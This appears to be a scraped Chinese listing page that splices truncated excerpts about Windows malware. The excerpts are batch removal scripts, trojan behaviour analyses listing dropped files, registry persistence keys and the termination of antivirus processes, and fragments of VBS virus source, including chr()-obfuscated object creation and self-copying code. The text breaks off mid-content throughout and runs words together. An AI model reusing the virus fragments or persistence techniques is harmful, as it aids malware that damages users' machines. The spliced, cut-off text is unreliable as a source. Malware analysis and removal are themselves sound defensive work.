@EchoOffcolor2ftitleAutorun病毒清除工具-ByPhexonRem杀进程taskkill/F/IMSocksA.exe/IMSVOHOST.exe/IMAdobeR.exe/IMravmone.exe/IMwincfgs.exe/IMdoc.exe/IMrose.exe/IMsxs.exe/IMautorun.exe/IMKB20060111.exe/IMtel.xls.exe>nul2>nul:clearautoclsEcho.Echo          &...

pskill msns.exeecho "杀MSNS使网络瘫痪的病毒……jb51.net"echo "关闭进程10……"echo "关闭进程9……"echo "关闭进程8……"echo "关闭进程7……"echo "关闭进程6……"echo "杀MSNS使网络瘫痪的病毒……jb51.net"attrib -H -S -R -A %windir%\system32\msns.exedel %windir%\system32\msns.exeregedit&n...

主要行为：1、释放文件：C:\Windows\System32\datmps.dll 21,984 byteC:\Windows\System32\wlite.sys 8,816 bytes2、添加启动项：[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\datmps]DllName = 64 61 74 6D 70 73 2E 64 ...

主要行为：1、释放文件：C:\Windows\System32\SCVVHSOT.exe671,744 bytesC:\Windows\Tasks\At1.job346 bytes2、添加启动项：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run键名为：Yahoo Messengger，指向SCVVHSOT.exe。3、修改注册表，跟随Explorer启动：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersio...

Modified: 2008年5月8日, 18:52:32MD5: 7009AC302C6D2C6AADEDE0D490D5D843SHA1: 0E10DA72367B8F03A4F16D875FEA251D47908E1ECRC32: DCE5AE5A病毒运行后：1.释放一个sbl.sys到%system32%\drivers下面，并拷贝一份覆盖beep.sys，之后加载该驱动，恢复SSDT钩子，导致某些杀毒软件的主动防御功能失效。2.结束很多杀毒软件和安全工具的进程诸如：Quote:360rpt.exe360Safe.exe360tray....

rem vbs.rhlDim fs,r,ss,w,reg,regpath,dvbsddd="Set fs =" &chr(67) & "reate" & "Obj" & chr(101) & "c" & chr(116) & chr(40) & chr(34) & "Scrip" & ch...

rememail:kouguoxi@hotmail.comremsomecrackstatementiremment,makeitcan'ttorunon error resume nextdim title,texttitle="can you help me find a person?"text="her name is Liu Chun li."&chr(13)&chr(10)text=text&"her ...

复制自身到c盘的huan.vbsASP/Visual Basic代码[code]set copy1=createobject("scripting.filesystemobject")         copy1.getfile(wscript.scriptfullname).copy("c:\huan.vbs")   [/code]...

以下是这两天极度猖獗的AUTO病毒最新变种的分析报告：一．行为概述该EXE是病毒下载器，它会：1） 参考系统C盘卷序列号来算出服务名，EXE 和DLL 的文件名。2） 在每一个驱动器下放置AUTO病毒autorun.inf 和自身副本auto.exe 并加系统和隐藏属性。3） 在系统system32 下放置自身副本“随机名.exe ”和释放出来的“随机名.dll” 并将它们伪装成具有隐藏属性的系统文件。4） 修改系统键值，将系统隐藏文件选项删除，造成用户无法查看隐藏起来的病毒文件。5）...

文件MD5：e98a4571cf72b798077d12d6c4894629行为分析：1、拷贝文件：C:\windows\system32\diskregerl.exe  45,056 字节2、无添加启动项举动。3、释放2个批处理：内容分别为：22483172132518761332269025373date 2004-08-1719477time 20:00:00ping 127.0.0.1 -n 5sc.exe create diskregerl BinPath= "C:...

行为：　　1．释放文件：　　C:\WINDOWS\system\SERVICES.EXE  65536 字节　　C:\WINDOWS\system\SYSANALYSIS.EXE  65536 字节　　C:\WINDOWS\system\explorer.exe 976896 字节　　2．删除备份文件：　　C:\WINDOWS\system32\dllcache\explorer.exe　　3．覆盖系统文件：C:\WINDOWS\explorer.exe　　系统启动时先执行病毒体，再执行C:\WINDOWS\sys...